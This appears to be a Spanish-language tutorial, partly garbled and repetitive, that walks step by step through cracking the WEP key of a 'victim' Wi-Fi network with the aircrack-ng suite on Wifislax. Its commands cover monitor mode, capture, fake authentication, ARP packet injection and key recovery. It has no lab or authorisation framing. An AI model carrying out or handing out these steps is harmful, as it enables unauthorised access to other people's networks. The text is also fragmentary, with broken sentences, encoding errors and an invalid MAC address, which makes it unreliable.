Professional Documents
Culture Documents
iwconfig
MI MAC
00:21:5C:0B:FA:63
Livecd
user: root
pass: toor
Abrir shell
MAC(BSSID): 23:82:7B:59:t6:76
CANAL(CH): Ej. 6
NOMBRE(ESSID): Infinitum2345
Inyectar Paquetes
OTRO METODO
Te aparecen las tarjetas que tienes instaladas en el sistema, entre ellas la que
utilizar�s, yo utilizo
airodump-ng -w aaaa -c6 wlan0 (Aqu� mismo sustituyes -c6 por el canal que t�
quieras) (El aaaa es un
Escoges alguna red con encriptaci�n WEP, abres una nueva consola y escribes lo
siguiente:
aireplay-ng -3 -x600 -b MACV -h MACC wlan0 (En este momento ya debes saber donde
vas a sustituir y con
que)
correr el airodump m�s el -01 o cualquier otro n�mero -02, -03 etc...)
_Otro
1)saber mi mac
2)saber la mac de la victima y el canal (utilizamos este programa: netbuster) A
buscar!
3)reiniciar pc con el wifislax en la lectora
4)usuario: root
5)pass: toor
6)para empezar ingresamos "startx"
7)si se pone la pantalla en negro por mucho tiempo presionamos ctrl + supr y nos
va a llevar de nuevo a la pantalla anterior en donde en vez de poner "startx"
vamos a introducir "xconf". este es un inconveniente con tu tarjeta grafica, nada
serio... seguimos.
8)vamos a la consola
9)lo primero que ponemos es "iwconfig" para ver si linux reconoce tu tarjeta de
red.
10)ingresamos "airmon-ng start wlan0 1" para pasar a modo monitor (lo que viene
acompa�ado de wlan es un cero) Explico un poco... el numero uno es el canal en
donde esta la victima que lo adquirimos en el punto numero 2 del este fant�stico
tutorial :p. El wlan0 es como linux tomo tu tarjeta de red.
11)luego ingresamos "airodump-ng -w datos -c1 wlan0" es un comando que crea un
archivo "datos" en el canal 1 con la tarjeta wlan0.
12)abrimos una nueva consola.
13)ingresamos lo siguiente "aireplay-ng -1 30 -e INFINITUMXXXX -a MAC VICTIMA -h
TU MAC wlan0" infinitum es el nombre de la victima que la encontramos en el punto
numero 2. La mac de la victima y tu mac... (lo unico que va en mayusculas son el
nombre, y las mac) ojo!! Todos los demas comandos en minusculas.
14)abrimos otra consola.
15)ingresamos "aireplay-ng -3 -x600 -b mac victima -h tu mac wlan0" inyectamos
paquetes al modem mientras que captura otros mas... vamos a necesitar 100.000
paquetes para decifrar la contrase�a...
16)tomate unos mates, dale bola a tu novia mientras bajan los paquetes...
17)abrimos otra consola (vamos 4).
18)ingresamos "aircrack-ptw datos-01.cap"
19)si no funciona, buscamos el archivo 01,02 o el que sea que pese mas bytes y lo
ejecutamos. Nos sale en la consola "clave encontrada bla bla"
20) Ya tenemos la contrase�a.